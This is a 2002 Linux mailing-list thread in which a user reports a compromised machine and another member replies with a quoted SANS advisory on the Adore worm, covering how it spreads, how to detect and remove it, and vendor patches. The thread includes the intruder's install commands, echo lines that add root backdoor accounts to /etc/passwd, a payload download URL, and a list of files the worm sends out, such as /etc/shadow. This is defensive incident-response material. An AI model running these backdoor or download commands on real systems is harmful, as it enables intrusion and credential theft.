[CLUE-Tech] Lousy no-good @!$#%@#$% (cracked)
Sean LeBlanc
seanleblanc at attbi.com
Mon Jan 28 22:17:04 MST 2002
On 01-28 21:29, Randy Arabie wrote:
> On Mon, 28 Jan 2002, Sean LeBlanc wrote:
>
> > tar xzvf adore.tgz
> > cd adore
> > ./configure
> > make
> > ./configure
> > pico adore.h
> > ls -a
> > ./startadore
>
> The adore worm....perhaps? The info below is from:
>
> http://www.sans.org/y2k/adore.htm
It looks like some of the symptoms - although the adorefind says nothing was
there. My ps has a new time stamp on it - where can I find the tarball for
this? I was trying to find suspect processes by hand in the /proc dir, but
that's getting tedious. I also found a /usr/lib/locale/ro_RO that has some
schtuff in it that I just blasted.
>
> <SNIP>
>
> Global Incident Analysis Center
>
> Adore Worm
> Version 0.8 - April 12, 2001
>
> William Stearns of Dartmouth's ISTS has written a script Adorefind to
> detect the Adore worm. Questions concerning this page or the Adorefind
> tool should be directed to handler at incidents.org.
>
> This note is a preliminary characterization of the Adore worm. The
> worm code can be modified by anyone at any time. We'll try to keep
> this page updated as we learn more.
>
> Description
>
> Adore is a worm that we originally called the Red Worm. It is similar
> to the Ramen and Lion worms. Adore scans the Internet checking Linux
> hosts to determine whether they are vulnerable to any of the following
> well-known exploits: LPRng, rpc-statd, wu-ftpd and BIND. LPRng is
> installed by default on Red Hat 7.0 systems. From the reports so far,
> Adore appears to have started its spread on April 1.
>
> Adore worm replaces only one system binary (ps), with a trojaned
> version and moves the original to /usr/bin/adore. It installs the
> files in /usr/lib/lib . It then sends an email to the following
> addresses: adore9000 at 21cn.com, adore9000 at sina.com, adore9001 at 21cn.com,
> adore9001 at sina.com
> Attempts have been made to get these addresses taken offline, but no
> response so far from the provider. It attempts to send the following
> information:
> * /etc/ftpusers
> * ifconfig
> * ps -aux (using the original binary in /usr/bin/adore)
> * /root/.bash_history
> * /etc/hosts
> * /etc/shadow
>
> Adore then runs a package called icmp. With the options provided with
> the tarball, it by default sets the port to listen too, and the packet
> length to watch for. When it sees this information it then sets a
> rootshell to allow connections. It also sets up a cronjob in cron
> daily (which runs at 04:02 am local time) to run and remove all traces
> of its existence and then reboots your system. However, it does not
> remove the backdoor.
>
> Variant
>
> There appears to be a new variant of the adore worm circulating about
> the internet. Adorefind 0.2.4 now finds this variant. Only changes
> from the original adore worm have been noted below:
> * Adore.V.02
>
> * Butcher.gz
> * Adds 2 users to passwd file
> * echo "dead:x:1:1:anarchee:/:/bin/sh" >> /etc/passwd;
> * echo "h:x:0:0:admin:/:/bin/sh" >> /etc/passwd;
> * It installs itself in /dev/.shit
> * http://www.geocities.com/butcherdvs/butcher.tgz
> >/dev/.shit/red.tgz;
> * Sends email to the following 2 address's dvsowned at gmx.net,
> dvsowned at hotmail.com
> * Unless you have GLIBC_2.1.3 installed, part of this worm does not
> work
> * Uses a program called Sock to try to setup another backdoor, and
> calls /bin/login to allow for a root shell
>
> Detection
>
> Dartmouth's ISTS has developed a utility called adorefind that will
> detect the adore files on an infected system. Simply download it,
> uncompress it, and run adorefind. It will list which of the suspect
> files is on the system.
>
> Download Adorefind Here from Dartmouth's ISTS site.
>
> Snort already detects most of these signatures:
>
> Removal
>
> As adorefind runs, it will give you the option to stop the running
> worm jobs and remove the files from the filesystem.
>
> Protection
>
> You can take the document that Chris Brenton created for the Lion
> worm, and modify it to look for the Adore worm. You can read it here.
> You should also block for outbound emails to the 4 email address's and
> block the website address go.163.com
>
> Analysis
>
> For an analysis of the adore package download this file:
> http://www.sans.org/y2k/practical/Michael_Reiter_GCIH.zip. Please note
> that this is an analysis done on the Adore rootkit which is a Loadable
> Kernel Module (LKM) and is not specifically analysis done on the
> red.tar adore worm.
>
> References
>
> Further information can be found at:
> * http://www.sans.org/current.htm
> * http://www.cert.org/advisories/CA-2001-02.html, CERT Advisory
> CA-2001-02, Multiple Vulnerabilities in BIND
> * http://www.kb.cert.org/vuls/id/196945 ISC BIND 8 contains buffer
> overflow in transaction signature (TSIG) handling code
> * http://www.sans.org/y2k/ramen.htm Information about the Ramen
> worm.
> * http://www.sans.org/y2k/DDoS.htm DDoS handling steps
> * http://www.isc.org/products/BIND/bind-security.html Web site for
> the creators of BIND
>
> The following vendor update pages may help you in fixing the original
> BIND vulnerability:
>
> Vendor Description URL
> Redhat Linux RHSA-2001:007-03 - BIND remote exploit
> http://www.redhat.com/support/errata/RHSA-2001-007.html
> RHSA-2000-065-06 - LPRng exploit
> http://www.redhat.com/support/errata/RHSA-2000-065-06.html< /a>
> RHSA-2000-039-02 - wuftpd remote exploit
> http://www.redhat.com/support/errata/RHSA-2000-039-02.html< /a>
> RHSA-2000-039-02 - Rpc statd exploit
> http://www.redhat.com/support/errata/RHSA-2000-043-03.html< /a>
> Debian GNU/Linux DSA-026-1 BIND
> http://www.debian.org/security/2001/dsa-026
> SuSE Linux SuSE-SA:2001:03 - BIND 8 remote root compromise.
> http://www.suse.com/de/support/security/2001_003_bind8_ txt.txt
> Caldera Linux CSSA-2001-008.0 BIND buffer overflow
> http://www.caldera.com/support/security/
> advisories/CSSA-2001-008.0.txt
> http://www.caldera.com/support/security/
> advisories/CSSA-2001-008.1.txt
> Slackware (linuxsecurity.com advisory) 1/30/2001 : Slackware: 'bind'
> vulnerabilities http://www.linuxsecurity.com/advisories/
> slackware_advisory-1121.html
> Mandrake MDKSA-2001:017 BIND vulnerabilities
> http://www.linuxmandrake.com/en/security/20 01/
> MDKSA-2001-017.php3?dis=7.2
> TurboLinux TLSA2001004-1 BIND vulnerabilities
> http://www.turbolinux.com/pipermail/tl-security-announce/
> 2001-February/000034.html
> Immunix 6.2 and 7.0-beta IMNX-2001-70-001-01 BIND vulnerabilities
> http://download.immunix.org/ImmunixOS/7.0-beta/
> updates/IMNX-2001-70-001-01
> Conectiva CLSA-2001:377 BIND vulnerabilities
> http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000377
> Storm Linux (see Debian)
>
> Frequently Asked Questions - FAQ's
>
> I'm running Unix-like Operating System X on Processor Y. Am I
> vulnerable to Adore?
>
> The only class of systems currently attacked by the sole known
> adore variant are Linux systems running on the x86 processor
> architecture. That said, the design allows for future variants to
> be released that attack some other Unix lookalike or some other
> processor type. At the very least, you should run adorefind to do a
> quick check. Also, no matter what your flavor of Unix or CPU type,
> you should be applying your vendor's patches!
>
> I'm running some version of Windows. Am I vulnerable?
>
> Almost certainly not. If that changes with some new worm release,
> we'll update this page with new information.
>
> Credits
>
> This security advisory was prepared by Matt Fearnow of the SANS
> Institute and William Stearns of the Dartmouth Institute for Security
> Technology Studies.
>
> The Adorefind utility was written by William Stearns.William is an
> Open-Source developer, enthusiast, and advocate from Vermont, USA. His
> day job at the Institute for Security Technology Studies at Dartmouth
> College pays him to work on network security and Linux projects.
>
> Also contributing efforts go to SANS GIAC contributors, Todd Clark
> from Copper Media, Greg Shipley of Neohapsis, Marion Bates of ISTS,
> and Alex Bates of ISTS.
>
> Mirrors
>
> This advisory page can be found at http://www.sans.org/y2k/adore.htm
> and http://www.ists.dartmouth.edu/IRIA/knowledge_bas
> e/tools/adorefind.htm
>
>
> << Back to GIAC
>
>
> Home | Events | Publications | Security Digests
> Resources | Web-Based Training | Contact SANS
>
>
> © 2001 SANS Institute : Office 301.951.0102 : Registration
> 1.866.570.9927 : Web Contact scott at sans.org
> </SNIP>
> --
>
> Cheers!
>
> Randy
>
> ================================================================
> Randy Arabie
> GnuPG Key Info --
>
> Fingerprint: 7E25 DFA2 EF72 9551 9C6C 8AA6 6E8C A0F5 7E33 D981
> Key ID: 7C603AEF
> http://www.arabie.org/keys/rrarabie.gnupg
> ================================================================
>
> _______________________________________________
> CLUE-Tech mailing list
> CLUE-Tech at clue.denver.co.us
> http://clue.denver.co.us/mailman/listinfo/clue-tech
--
Sean LeBlanc:seanleblanc at attbi.com Yahoo:seanleblancathome
ICQ:138565743 MSN:seanleblancathome AIM:sleblancathome
We will not know unless we begin.
-Howard Zinn
More information about the clue-tech
mailing list